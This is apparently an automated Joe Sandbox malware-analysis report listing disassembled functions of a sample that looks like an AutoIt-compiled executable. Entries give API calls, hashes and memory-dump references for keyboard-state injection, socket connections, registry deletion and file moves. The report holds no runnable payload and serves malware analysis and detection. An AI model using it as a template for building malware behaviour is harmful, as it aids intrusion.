                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 93808dcfc9eff94ada3c5ed34282bb143451d16fd145cc3f6cb2f8944c344166
                                                                      • Instruction ID: edf702374f2cde1e95a6cb66f3c288652c53d3a2f6ce7038a242e8b244c91ff8
                                                                      • Opcode Fuzzy Hash: 93808dcfc9eff94ada3c5ed34282bb143451d16fd145cc3f6cb2f8944c344166
                                                                      • Instruction Fuzzy Hash: 4351E3A0504BD57EFB3646389C09BB6BEE97B06304F08C589E1DD898C3C2A89CD8F755
                                                                      Function 00570D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00570DA5
                                                                      • GetKeyboardState.USER32(?), ref: 00570DBA
                                                                      • SetKeyboardState.USER32(?), ref: 00570E1B
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00570E47
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00570E64
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00570EA8
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00570EC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 988af3b1ad3272b7a76f778e587493a6842b923825f604c82ac1287ec7a4a3d1
                                                                      • Instruction ID: cb34035ce88368859611c0e3b7c78ee087428b4bac2a22e9f3f9b2cc8cbd0505
                                                                      • Opcode Fuzzy Hash: 988af3b1ad3272b7a76f778e587493a6842b923825f604c82ac1287ec7a4a3d1
                                                                      • Instruction Fuzzy Hash: 2551F3A05047D5BDFB3287249C45B7ABFE9BB06300F08D889E5DC868C2C395AC98F750
                                                                      Function 005755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 2945705084-0
                                                                      • Opcode ID: e2c8613f45772d5159da3fba3af1b50219726d55d73bd739f61e42afbfb5254e
                                                                      • Instruction ID: 5db67f032f58edea3aa20c6aa47bf0734fca5f409eaf51b3c8b9d131691e1996
                                                                      • Opcode Fuzzy Hash: e2c8613f45772d5159da3fba3af1b50219726d55d73bd739f61e42afbfb5254e
                                                                      • Instruction Fuzzy Hash: 9E41B375D1061576CB11EBB49C8A9CFBBB8BF44310F508966E508E3221FB34E255C7AA
                                                                      Function 0056D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0056D5D4
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0056D60A
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0056D61B
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0056D69D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: ,,Z$DllGetClassObject
                                                                      • API String ID: 753597075-3561685201
                                                                      • Opcode ID: 559929aaab7e6fd3baeab0a47f6bc32f6b27c159bba922ecf6014aa207671343
                                                                      • Instruction ID: e4e4d46c60179a1d16976dfe8a3a5a2bcec860fe26f8e8d4e59d1b20e3f7a163
                                                                      • Opcode Fuzzy Hash: 559929aaab7e6fd3baeab0a47f6bc32f6b27c159bba922ecf6014aa207671343
                                                                      • Instruction Fuzzy Hash: 80418DB1A00205EFDB05CF64C884A9ABFB9FF58310F1589A9EC099F205DBB1D944DBB0
                                                                      Function 00573671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573697,?), ref: 0057468B
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573697,?), ref: 005746A4
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 005736B7
                                                                      • _wcscmp.LIBCMT ref: 005736D3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 005736EB
                                                                      • _wcscat.LIBCMT ref: 00573733
                                                                      • SHFileOperationW.SHELL32(?), ref: 0057379F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 1377345388-1173974218
                                                                      • Opcode ID: 5ca329353fffafd88e27670b943834cfccc167de119377b671a166eaec4cf803
                                                                      • Instruction ID: 7f884fd662ad88a83530aca6aa54872e45acf1d069f2c2b0ac503eb7455e26fd
                                                                      • Opcode Fuzzy Hash: 5ca329353fffafd88e27670b943834cfccc167de119377b671a166eaec4cf803
                                                                      • Instruction Fuzzy Hash: 1D418FB1108346AEC755EF64E4459DFBBE8FF88390F00482EB489C3251EB34D689EB52
                                                                      Function 00597291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 005972AA
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597351
                                                                      • IsMenu.USER32(?), ref: 00597369
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005973B1
                                                                      • DrawMenuBar.USER32 ref: 005973C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      • Opcode ID: 9fe6d7db12e4db264a73c184fe795f64dfe61547b69f0624355b04f38a31b4be
                                                                      • Instruction ID: 399d1c887d345af87957fad98215e24fda2cf69c53d84aa3c05381d3bec022b9
                                                                      • Opcode Fuzzy Hash: 9fe6d7db12e4db264a73c184fe795f64dfe61547b69f0624355b04f38a31b4be
                                                                      • Instruction Fuzzy Hash: 11411575A14209EFDF20DF50D884A9ABBF8FB09350F24892AFD15A7250D730AD54EF50
                                                                      Function 00590FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00590FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 005910B5
                                                                        • Part of subcall function 00590FA5: RegCloseKey.ADVAPI32(?), ref: 0059101B
                                                                        • Part of subcall function 00590FA5: FreeLibrary.KERNEL32(?), ref: 0059106D
                                                                        • Part of subcall function 00590FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00591090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00591058
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: abd7662440d58a8fd7689f87a44b3fa40caac5f74114c244e20fe1220c165904
                                                                      • Instruction ID: 3331fa1c0f587c470677fb4baa4dec0e0b4b377c00ddbd05b1592f3a3feea1ef
                                                                      • Opcode Fuzzy Hash: abd7662440d58a8fd7689f87a44b3fa40caac5f74114c244e20fe1220c165904
                                                                      • Instruction Fuzzy Hash: 08310A7190111ABFDF159B90DC8DAFFBBBCFF08300F00056AE512E2151EA759E899BA4
                                                                      Function 005962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005962EC
                                                                      • GetWindowLongW.USER32(01004C58,000000F0), ref: 0059631F
                                                                      • GetWindowLongW.USER32(01004C58,000000F0), ref: 00596354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00596386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005963B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005963C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005963DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 90fa75cd4c9868071a2031b1bb58037d389237e0935e033ddd907f0b324c0692
                                                                      • Instruction ID: 8b76e8eb24593fca72cc5f36e4709a4722e51dc1362afa0ddf9b1808a03c4034
                                                                      • Opcode Fuzzy Hash: 90fa75cd4c9868071a2031b1bb58037d389237e0935e033ddd907f0b324c0692
                                                                      • Instruction Fuzzy Hash: 8D31FE30644251AFDB218F19DC85F583BE1FB5A714F6905AAF501CB2B2CB71A848AB51
                                                                      Function 0056DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0056DB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 0056DB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0056DBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 1623d63f7fdd8b4da4299cd7e962ac9f150b9a892ea811b9828251a575557abb
                                                                      • Instruction ID: 13ae34be3fe0d6192ea9b7e589b2b646b115689f421865e147ffda0ec01500fe
                                                                      • Opcode Fuzzy Hash: 1623d63f7fdd8b4da4299cd7e962ac9f150b9a892ea811b9828251a575557abb
                                                                      • Instruction Fuzzy Hash: C8219536B00219AFDF10DFA8DC88CBB77ACFB19360B058966F914DB264DA709C459B74
                                                                      Function 00586173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00587D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00587DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005861C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005861D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0058620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00586217
                                                                      • WSAGetLastError.WSOCK32 ref: 00586221
                                                                      • closesocket.WSOCK32(00000000), ref: 0058624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00586263
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      • Opcode ID: 6fae25b76ddb5440db9d89699245fe3fcef698ef5b802172702f4421a62b8534
                                                                      • Instruction ID: 75f84a8f50e22d9929f747b719714e7e8dd51f9276d8a3d9b93e470d90dd3266
                                                                      • Opcode Fuzzy Hash: 6fae25b76ddb5440db9d89699245fe3fcef698ef5b802172702f4421a62b8534
                                                                      • Instruction Fuzzy Hash: 37319035600108ABEF10AF64CC89BBE7BADFB45765F044469FD06E7291CB70AD44DBA1
                                                                      Function 0056F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: 2dbddab82c3676b2cf01f909feb56fc9643fb9e717cf52705953fff3080bc7c1
                                                                      • Instruction ID: 852568b8db353abe275f9e00ccffa89288806b597edf6f4dbf15fae65e71fef1
                                                                      • Opcode Fuzzy Hash: 2dbddab82c3676b2cf01f909feb56fc9643fb9e717cf52705953fff3080bc7c1
                                                                      • Instruction Fuzzy Hash: C72146B2A0461266D330AA34FC07EAB7F98FF96340F104439F846870A1EB519E82D3A5
                                                                      Function 0056DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0056DC32
                                                                      • SysAllocString.OLEAUT32 ref: 0056DC53
                                                                      • SysFreeString.OLEAUT32 ref: 0056DC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0056DC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DC84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 88d21bd631725688b172fad89046c975d59436d54831912dcc14f128a3f95659
                                                                      • Instruction ID: 51b9b455cf88591bb821a4ffd968505c79811ab720cfea8e52a15b7277af38ea
                                                                      • Opcode Fuzzy Hash: 88d21bd631725688b172fad89046c975d59436d54831912dcc14f128a3f95659
                                                                      • Instruction Fuzzy Hash: F6215135704208AFEB10ABA8DC88DAA7BACFB19360B158526F914CB2A0D6709C45DB64
                                                                      Function 005975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
                                                                        • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
                                                                        • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0059763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0059764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597665
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 0e9d5e0dcdee867c5fd13638def80809393d8b2d5dd3c962c141a8fce90f5933
                                                                      • Instruction ID: fe54546196779129bcc045110c0f372884f62850a54ab9316b08bc3e4b6e2545
                                                                      • Opcode Fuzzy Hash: 0e9d5e0dcdee867c5fd13638def80809393d8b2d5dd3c962c141a8fce90f5933
                                                                      • Instruction Fuzzy Hash: 2A11B2B211021DBFEF118F64CC85EE77F6DFF08798F114115BA04A20A0CA729C21DBA4
                                                                      Function 00539AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00539AE6
                                                                        • Part of subcall function 00533187: EncodePointer.KERNEL32(00000000), ref: 0053318A
                                                                        • Part of subcall function 00533187: __initp_misc_winsig.LIBCMT ref: 005331A5
                                                                        • Part of subcall function 00533187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00539EA0
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00539EB4
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00539EC7
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00539EDA
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00539EED
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00539F00
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00539F13
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00539F26
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00539F39
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00539F4C
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00539F5F
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00539F72
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00539F85
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00539F98
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00539FAB
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00539FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00539AEB
                                                                      • __mtterm.LIBCMT ref: 00539AF4
                                                                        • Part of subcall function 00539B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539AF9,00537CD0,005CA0B8,00000014), ref: 00539C56
                                                                        • Part of subcall function 00539B5C: _free.LIBCMT ref: 00539C5D
                                                                        • Part of subcall function 00539B5C: DeleteCriticalSection.KERNEL32(02],?,?,00539AF9,00537CD0,005CA0B8,00000014), ref: 00539C7F
                                                                      • __calloc_crt.LIBCMT ref: 00539B19
                                                                      • __initptd.LIBCMT ref: 00539B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00539B42
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
